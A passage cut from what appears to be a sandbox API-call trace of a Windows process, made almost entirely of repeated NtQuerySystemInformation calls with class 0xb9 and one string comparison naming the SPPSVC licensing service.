SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x28, ResultLength=0x0) [0294.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0294.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e830, Length=0x20, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8f0, Length=0x20, ResultLength=0x0) [0294.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0294.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6f0, Length=0x28, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6d0, Length=0x20, ResultLength=0x0) [0294.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0294.656] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0294.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.669] NtQuerySystemInformation 